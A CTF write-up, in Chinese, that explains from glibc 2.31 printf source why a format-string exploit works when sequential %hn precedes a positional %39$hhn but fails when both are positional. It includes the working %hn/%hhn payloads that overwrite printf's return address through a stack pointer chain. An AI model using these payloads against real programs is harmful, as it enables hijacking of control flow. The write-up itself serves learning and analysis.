0x00

在第六届强网拟态线下赛的一道格式化字符串漏洞题目中,遇到了一个一时没想通的现象。后来找时间读了一下 printf 的源码(glibc 2.31),终于弄清了原因。

0x01 issue

看似奇怪、实则合理的现象

# First attempt: both writes use positional (%N$) specifiers.
# '%<printf_ret>c' pads the output count up to printf_ret, then '%11$hn' stores
# that count as a 2-byte value through argument 11.
# The second '%c' adds 0x10000 - printf_ret + 0x23, bringing the running count
# to 0x10023, so '%39$hhn' stores the single byte 0x23 through argument 39.
# NOTE(review): printf_ret and io are defined outside this snippet; printf_ret
# is presumably the low 16 bits of the stack slot holding printf's return
# address - confirm against the full exploit.
payload = '%{}c'.format(printf_ret).encode() + b"%11$hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

最初我是这样写的。调试发现只成功修改了跳板,而真正的目标——也就是 printf 的返回地址——却没有被修改到

# Second attempt: the first write uses sequential (non-positional) specifiers.
# Nine '%p' consume arguments 1-9 and '%c' consumes argument 10, so the plain
# '%hn' stores through argument 11 - the same argument '%11$hn' addressed.
# NOTE(review): the '- 90' presumably compensates for the characters printed by
# the nine '%p' (10 each), so the count at '%hn' is still printf_ret - confirm.
# Only the final '%39$hhn' is positional.
payload = b'%p'*9 + '%{}c'.format(printf_ret - 90).encode() + b"%hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

而换一种写法:先用 9 个 %p 和一个 %c 按顺序消耗前 10 个参数,再用不带 $ 的 %hn 去写第 11 个参数指向的位置,这样两处却都能修改成功

0x02 why?

探究一下多个 % 偏移参数和 $ 偏移参数在格式化字符串中的差异

我们找到源码中处理格式化字符串的部分(glibc 2.31)

/* Process whole format string.  */
do
{
STEP0_3_TABLE;
STEP4_TABLE;

union printf_arg *args_value; /* This is not used here but ... */
int is_negative; /* Flag for negative number. */
union
{
unsigned long long int longlong;
unsigned long int word;
} number;
int base;
union printf_arg the_arg;
CHAR_T *string; /* Pointer to argument string. */
int alt = 0; /* Alternate format. */
int space = 0; /* Use space prefix if no sign is needed. */
int left = 0; /* Left-justify output. */
int showsign = 0; /* Always begin with plus or minus sign. */
int group = 0; /* Print numbers according grouping rules. */
int is_long_double = 0; /* Argument is long double/ long long int. */
int is_short = 0; /* Argument is short int. */
int is_long = 0; /* Argument is long int. */
int is_char = 0; /* Argument is promoted (unsigned) char. */
int width = 0; /* Width of output; 0 means none specified. */
int prec = -1; /* Precision of output; -1 means none specified. */
/* This flag is set by the 'I' modifier and selects the use of the
`outdigits' as determined by the current locale. */
int use_outdigits = 0;
UCHAR_T pad = L_(' ');/* Padding character. */
CHAR_T spec;

workstart = NULL;
workend = work_buffer + WORK_BUFFER_SIZE;

/* Get current character in format string. */
JUMP (*++f, step0_jumps);

/* ' ' flag. */
LABEL (flag_space):
space = 1;
JUMP (*++f, step0_jumps);

/* '+' flag. */
LABEL (flag_plus):
showsign = 1;
JUMP (*++f, step0_jumps);

/* The '-' flag. */
LABEL (flag_minus):
left = 1;
pad = L_(' ');
JUMP (*++f, step0_jumps);

/* The '#' flag. */
LABEL (flag_hash):
alt = 1;
JUMP (*++f, step0_jumps);

/* The '0' flag. */
LABEL (flag_zero):
if (!left)
pad = L_('0');
JUMP (*++f, step0_jumps);

/* The '\'' flag. */
LABEL (flag_quote):
group = 1;

if (grouping == (const char *) -1)
{
#ifdef COMPILE_WPRINTF
thousands_sep = _NL_CURRENT_WORD (LC_NUMERIC,
_NL_NUMERIC_THOUSANDS_SEP_WC);
#else
thousands_sep = _NL_CURRENT (LC_NUMERIC, THOUSANDS_SEP);
#endif

grouping = _NL_CURRENT (LC_NUMERIC, GROUPING);
if (*grouping == '\0' || *grouping == CHAR_MAX
#ifdef COMPILE_WPRINTF
|| thousands_sep == L'\0'
#else
|| *thousands_sep == '\0'
#endif
)
grouping = NULL;
}
JUMP (*++f, step0_jumps);

LABEL (flag_i18n):
use_outdigits = 1;
JUMP (*++f, step0_jumps);

/* Get width from argument. */
LABEL (width_asterics):
{
const UCHAR_T *tmp; /* Temporary value. */

tmp = ++f;
if (ISDIGIT (*tmp))
{
int pos = read_int (&tmp);

if (pos == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (pos && *tmp == L_('$'))
/* The width comes from a positional parameter. */
goto do_positional;
}
width = va_arg (ap, int);

/* Negative width means left justified. */
if (width < 0)
{
width = -width;
pad = L_(' ');
left = 1;
}

if (__glibc_unlikely (width >= INT_MAX / sizeof (CHAR_T) - EXTSIZ))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (width >= WORK_BUFFER_SIZE - EXTSIZ)
{
/* We have to use a special buffer. */
size_t needed = ((size_t) width + EXTSIZ) * sizeof (CHAR_T);
if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + width + EXTSIZ;
else
{
workstart = (CHAR_T *) malloc (needed);
if (workstart == NULL)
{
done = -1;
goto all_done;
}
workend = workstart + width + EXTSIZ;
}
}
}
JUMP (*f, step1_jumps);

/* Given width in format string. */
LABEL (width):
width = read_int (&f);

if (__glibc_unlikely (width == -1
|| width >= INT_MAX / sizeof (CHAR_T) - EXTSIZ))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (width >= WORK_BUFFER_SIZE - EXTSIZ)
{
/* We have to use a special buffer. */
size_t needed = ((size_t) width + EXTSIZ) * sizeof (CHAR_T);
if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + width + EXTSIZ;
else
{
workstart = (CHAR_T *) malloc (needed);
if (workstart == NULL)
{
done = -1;
goto all_done;
}
workend = workstart + width + EXTSIZ;
}
}
if (*f == L_('$'))
/* Oh, oh. The argument comes from a positional parameter. */
goto do_positional;
JUMP (*f, step1_jumps);

LABEL (precision):
++f;
if (*f == L_('*'))
{
const UCHAR_T *tmp; /* Temporary value. */

tmp = ++f;
if (ISDIGIT (*tmp))
{
int pos = read_int (&tmp);

if (pos == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (pos && *tmp == L_('$'))
/* The precision comes from a positional parameter. */
goto do_positional;
}
prec = va_arg (ap, int);

/* If the precision is negative the precision is omitted. */
if (prec < 0)
prec = -1;
}
else if (ISDIGIT (*f))
{
prec = read_int (&f);

/* The precision was specified in this case as an extremely
large positive value. */
if (prec == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
}
else
prec = 0;
if (prec > width && prec > WORK_BUFFER_SIZE - EXTSIZ)
{
/* Deallocate any previously allocated buffer because it is
too small. */
if (__glibc_unlikely (workstart != NULL))
free (workstart);
workstart = NULL;
if (__glibc_unlikely (prec >= INT_MAX / sizeof (CHAR_T) - EXTSIZ))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
size_t needed = ((size_t) prec + EXTSIZ) * sizeof (CHAR_T);

if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + prec + EXTSIZ;
else
{
workstart = (CHAR_T *) malloc (needed);
if (workstart == NULL)
{
done = -1;
goto all_done;
}
workend = workstart + prec + EXTSIZ;
}
}
JUMP (*f, step2_jumps);

/* Process 'h' modifier. There might another 'h' following. */
LABEL (mod_half):
is_short = 1;
JUMP (*++f, step3a_jumps);

/* Process 'hh' modifier. */
LABEL (mod_halfhalf):
is_short = 0;
is_char = 1;
JUMP (*++f, step4_jumps);

/* Process 'l' modifier. There might another 'l' following. */
LABEL (mod_long):
is_long = 1;
JUMP (*++f, step3b_jumps);

/* Process 'L', 'q', or 'll' modifier. No other modifier is
allowed to follow. */
LABEL (mod_longlong):
is_long_double = 1;
is_long = 1;
JUMP (*++f, step4_jumps);

LABEL (mod_size_t):
is_long_double = sizeof (size_t) > sizeof (unsigned long int);
is_long = sizeof (size_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);

LABEL (mod_ptrdiff_t):
is_long_double = sizeof (ptrdiff_t) > sizeof (unsigned long int);
is_long = sizeof (ptrdiff_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);

LABEL (mod_intmax_t):
is_long_double = sizeof (intmax_t) > sizeof (unsigned long int);
is_long = sizeof (intmax_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);

/* Process current format. */
while (1)
{
process_arg (((struct printf_spec *) NULL));
process_string_arg (((struct printf_spec *) NULL));

LABEL (form_unknown):
if (spec == L_('\0'))
{
/* The format string ended before the specifier is complete. */
__set_errno (EINVAL);
done = -1;
goto all_done;
}

/* If we are in the fast loop force entering the complicated
one. */
goto do_positional;
}

/* The format is correctly handled. */
++nspecs_done;

if (__glibc_unlikely (workstart != NULL))
free (workstart);
workstart = NULL;

/* Look for next format specifier. */
#ifdef COMPILE_WPRINTF
f = __find_specwc ((end_of_spec = ++f));
#else
f = __find_specmb ((end_of_spec = ++f));
#endif

/* Write the following constant string. */
outstring (end_of_spec, f - end_of_spec);
}
while (*f != L_('\0'));

其中涉及到的几个跳转表都定义在宏 STEP0_3_TABLE 以及 STEP4_TABLE 里,定义如下

#define STEP0_3_TABLE							      \
/* Step 0: at the beginning. */ \
static JUMP_TABLE_TYPE step0_jumps[30] = \
{ \
REF (form_unknown), \
REF (flag_space), /* for ' ' */ \
REF (flag_plus), /* for '+' */ \
REF (flag_minus), /* for '-' */ \
REF (flag_hash), /* for '<hash>' */ \
REF (flag_zero), /* for '0' */ \
REF (flag_quote), /* for '\'' */ \
REF (width_asterics), /* for '*' */ \
REF (width), /* for '1'...'9' */ \
REF (precision), /* for '.' */ \
REF (mod_half), /* for 'h' */ \
REF (mod_long), /* for 'l' */ \
REF (mod_longlong), /* for 'L', 'q' */ \
REF (mod_size_t), /* for 'z', 'Z' */ \
REF (form_percent), /* for '%' */ \
REF (form_integer), /* for 'd', 'i' */ \
REF (form_unsigned), /* for 'u' */ \
REF (form_octal), /* for 'o' */ \
REF (form_hexa), /* for 'X', 'x' */ \
REF (form_float), /* for 'E', 'e', 'F', 'f', 'G', 'g' */ \
REF (form_character), /* for 'c' */ \
REF (form_string), /* for 's', 'S' */ \
REF (form_pointer), /* for 'p' */ \
REF (form_number), /* for 'n' */ \
REF (form_strerror), /* for 'm' */ \
REF (form_wcharacter), /* for 'C' */ \
REF (form_floathex), /* for 'A', 'a' */ \
REF (mod_ptrdiff_t), /* for 't' */ \
REF (mod_intmax_t), /* for 'j' */ \
REF (flag_i18n), /* for 'I' */ \
};
/* Step 1: after processing width. */ \
static JUMP_TABLE_TYPE step1_jumps[30] =
{
...
}
/* Step 2: after processing precision. */ \
static JUMP_TABLE_TYPE step2_jumps[30] =
{
...
}
/* Step 3a: after processing first 'h' modifier. */ \
static JUMP_TABLE_TYPE step3a_jumps[30] =
{
...
}
/* Step 3b: after processing first 'l' modifier. */ \
static JUMP_TABLE_TYPE step3b_jumps[30] =
{
...
}

/* STEP4_TABLE declares step4_jumps, the jump table used for the character
   that follows a completed length modifier (e.g. after 'hh', 'll', 'z').
   Every slot belonging to a flag, width, precision or modifier character maps
   to form_unknown; only the conversion specifiers ('%', 'd', 'c', 'n', ...)
   keep their real handlers.  */
#define STEP4_TABLE \
/* Step 4: processing format specifier. */ \
static JUMP_TABLE_TYPE step4_jumps[30] = \
{ \
REF (form_unknown), \
REF (form_unknown), /* for ' ' */ \
REF (form_unknown), /* for '+' */ \
REF (form_unknown), /* for '-' */ \
REF (form_unknown), /* for '<hash>' */ \
REF (form_unknown), /* for '0' */ \
REF (form_unknown), /* for '\'' */ \
REF (form_unknown), /* for '*' */ \
REF (form_unknown), /* for '1'...'9' */ \
REF (form_unknown), /* for '.' */ \
REF (form_unknown), /* for 'h' */ \
REF (form_unknown), /* for 'l' */ \
REF (form_unknown), /* for 'L', 'q' */ \
REF (form_unknown), /* for 'z', 'Z' */ \
REF (form_percent), /* for '%' */ \
REF (form_integer), /* for 'd', 'i' */ \
REF (form_unsigned), /* for 'u' */ \
REF (form_octal), /* for 'o' */ \
REF (form_hexa), /* for 'X', 'x' */ \
REF (form_float), /* for 'E', 'e', 'F', 'f', 'G', 'g' */ \
REF (form_character), /* for 'c' */ \
REF (form_string), /* for 's', 'S' */ \
REF (form_pointer), /* for 'p' */ \
REF (form_number), /* for 'n' */ \
REF (form_strerror), /* for 'm' */ \
REF (form_wcharacter), /* for 'C' */ \
REF (form_floathex), /* for 'A', 'a' */ \
REF (form_unknown), /* for 't' */ \
REF (form_unknown), /* for 'j' */ \
REF (form_unknown) /* for 'I' */ \
}

省略部分基本都长一个样:按照顺序,先处理标志、宽度、精度等等,再根据具体的转换说明符进行操作。
下面以 %n 为例来分析一下处理流程,对应宏 process_arg(fspec) 中的 form_number 分支:

LABEL (form_number):						      \
if ((mode_flags & PRINTF_FORTIFY) != 0) \
{ \
if (! readonly_format) \
{ \
extern int __readonly_area (const void *, size_t) \
attribute_hidden; \
readonly_format \
= __readonly_area (format, ((STR_LEN (format) + 1) \
* sizeof (CHAR_T))); \
} \
if (readonly_format < 0) \
__libc_fatal ("*** %n in writable segment detected ***\n"); \
} \
/* Answer the count of characters written. */ \
if (fspec == NULL) \
{ \
if (is_longlong) \
*(long long int *) va_arg (ap, void *) = done; \
else if (is_long_num) \
*(long int *) va_arg (ap, void *) = done; \
else if (is_char) \
*(char *) va_arg (ap, void *) = done; \
else if (!is_short) \
*(int *) va_arg (ap, void *) = done; \
else \
*(short int *) va_arg (ap, void *) = done; \
} \
else \
if (is_longlong) \
*(long long int *) args_value[fspec->data_arg].pa_pointer = done; \
else if (is_long_num) \
*(long int *) args_value[fspec->data_arg].pa_pointer = done; \
else if (is_char) \
*(char *) args_value[fspec->data_arg].pa_pointer = done; \
else if (!is_short) \
*(int *) args_value[fspec->data_arg].pa_pointer = done; \
else \
*(short int *) args_value[fspec->data_arg].pa_pointer = done; \
break;

可以看到这里会判断 fspec 的状态:若为 NULL,则直接通过 va_arg(ap, type) 按顺序逐个取参,也就是线性地先取寄存器、再取栈上的参数,并且 %n 的写入在解析到该占位符时立即完成。(**在 x86-64 下,rdi 存放的是格式化字符串本身的地址,所以 % 占位符对应的参数从 rsi 开始:先是 rsi、rdx、rcx、r8、r9 这五个寄存器,之后才是栈上的内存单元**)
如果不为 NULL,则从 args_value[fspec->data_arg] 取参数,这里的索引是提前确定好的。在哪里确定呢?当使用 $ 来指定参数位置时,会跳转到一段专门的处理逻辑:

if (*f == L_('$'))
/* Oh, oh. The argument comes from a positional parameter. */
goto do_positional;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
do_positional:
if (__glibc_unlikely (workstart != NULL))
{
free (workstart);
workstart = NULL;
}
done = printf_positional (s, format, readonly_format, ap, &ap_save,
done, nspecs_done, lead_str_end, work_buffer,
save_errno, grouping, thousands_sep, mode_flags);

all_done:
if (__glibc_unlikely (workstart != NULL))
free (workstart);
/* Unlock the stream. */
_IO_funlockfile (s);
_IO_cleanup_region_end (0);

return done;
}

do_positional 处会调用 printf_positional 函数。这个函数非常长,这里不全贴,只展示关键流程。
先是对参数存储区域的初始化,不再赘述;然后依次通过 va_arg 把各个参数取出,放入 args_value[]

/* Fill in the types of all the arguments.  */
for (cnt = 0; cnt < nspecs; ++cnt)
{
/* If the width is determined by an argument this is an int. */
if (specs[cnt].width_arg != -1)
args_type[specs[cnt].width_arg] = PA_INT;

/* If the precision is determined by an argument this is an int. */
if (specs[cnt].prec_arg != -1)
args_type[specs[cnt].prec_arg] = PA_INT;

switch (specs[cnt].ndata_args)
{
case 0: /* No arguments. */
break;
case 1: /* One argument; we already have the
type and size. */
args_type[specs[cnt].data_arg] = specs[cnt].data_arg_type;
args_size[specs[cnt].data_arg] = specs[cnt].size;
break;
default:
/* We have more than one argument for this format spec.
We must call the arginfo function again to determine
all the types. */
(void) (*__printf_arginfo_table[specs[cnt].info.spec])
(&specs[cnt].info,
specs[cnt].ndata_args, &args_type[specs[cnt].data_arg],
&args_size[specs[cnt].data_arg]);
break;
}
}

/* Now we know all the types and the order. Fill in the argument
values. */
for (cnt = 0; cnt < nargs; ++cnt)
switch (args_type[cnt])
{
#define T(tag, mem, type) \
case tag: \
args_value[cnt].mem = va_arg (*ap_savep, type); \
break

T (PA_WCHAR, pa_wchar, wint_t);
case PA_CHAR: /* Promoted. */
case PA_INT|PA_FLAG_SHORT: /* Promoted. */
#if LONG_MAX == INT_MAX
case PA_INT|PA_FLAG_LONG:
#endif
T (PA_INT, pa_int, int);
#if LONG_MAX == LONG_LONG_MAX
case PA_INT|PA_FLAG_LONG:
#endif
T (PA_INT|PA_FLAG_LONG_LONG, pa_long_long_int, long long int);
#if LONG_MAX != INT_MAX && LONG_MAX != LONG_LONG_MAX
# error "he?"
#endif
case PA_FLOAT: /* Promoted. */
T (PA_DOUBLE, pa_double, double);
case PA_DOUBLE|PA_FLAG_LONG_DOUBLE:
if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
{
args_value[cnt].pa_double = va_arg (*ap_savep, double);
args_type[cnt] &= ~PA_FLAG_LONG_DOUBLE;
}
#if __HAVE_FLOAT128_UNLIKE_LDBL
else if ((mode_flags & PRINTF_LDBL_USES_FLOAT128) != 0)
args_value[cnt].pa_float128 = va_arg (*ap_savep, _Float128);
#endif
else
args_value[cnt].pa_long_double = va_arg (*ap_savep, long double);
break;
case PA_STRING: /* All pointers are the same */
case PA_WSTRING: /* All pointers are the same */
T (PA_POINTER, pa_pointer, void *);
#undef T
default:
if ((args_type[cnt] & PA_FLAG_PTR) != 0)
args_value[cnt].pa_pointer = va_arg (*ap_savep, void *);
else if (__glibc_unlikely (__printf_va_arg_table != NULL)
&& __printf_va_arg_table[args_type[cnt] - PA_LAST] != NULL)
{
args_value[cnt].pa_user = alloca (args_size[cnt]);
(*__printf_va_arg_table[args_type[cnt] - PA_LAST])
(args_value[cnt].pa_user, ap_savep);
}
else
memset (&args_value[cnt], 0, sizeof (args_value[cnt]));
break;
case -1:
/* Error case. Not all parameters appear in N$ format
strings. We have no way to determine their type. */
assert ((mode_flags & PRINTF_FORTIFY) != 0);
__libc_fatal ("*** invalid %N$ use detected ***\n");
}

这相当于建立了一个“参数快照”,也就是把此时全部参数的值保存了下来;然后从尚未处理的第 nspecs_done 个占位符开始,继续处理格式化字符串中剩余的占位符

/* Now walk through all format specifiers and process them.  */
for (; (size_t) nspecs_done < nspecs; ++nspecs_done)
{
STEP4_TABLE;
...
process_arg ((&specs[nspecs_done]));
process_string_arg ((&specs[nspecs_done]));
...
}

这里使用的也是同样的处理宏,与前面快速路径中的用法对比如下

do
{
...
process_arg (((struct printf_spec *) NULL));
process_string_arg (((struct printf_spec *) NULL));
...
} while();

但是 printf_positional 函数传入的 fspec 不再是 NULL,而是 &specs[nspecs_done],此时 %n 会从 args_value[] 中取指针。args_value[] 是在进入 printf_positional 时一次性填好的,之后即使某个 %n 改写了栈上的参数,也不会影响已经建立的“参数快照”。这也就解释了为什么

# Working payload: nine '%p' plus '%c' consume arguments 1-10 sequentially, so
# the plain '%hn' stores through argument 11; only '%39$hhn' is positional.
payload = b'%p'*9 + '%{}c'.format(printf_ret - 90).encode() + b"%hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

这样可以一次性修改成功,而

# Failing payload: both writes ('%11$hn' and '%39$hhn') use positional
# specifiers.
payload = '%{}c'.format(printf_ret).encode() + b"%11$hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

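这样却不行的情况了:后一种写法在第一个 %n 之前就出现了 $(%11$hn),于是在任何写入发生之前就进入了 printf_positional 并建立快照,%39$hhn 用的是快照里修改前的旧指针,所以只有跳板被改,目标没有被改到;而前一种写法中,不带 $ 的 %hn 在快速路径里通过 va_arg 实时完成了对跳板的修改,直到解析到 %39$ 才进入 printf_positional,此时建立的快照已经包含了修改后的跳板值,于是两处都能修改成功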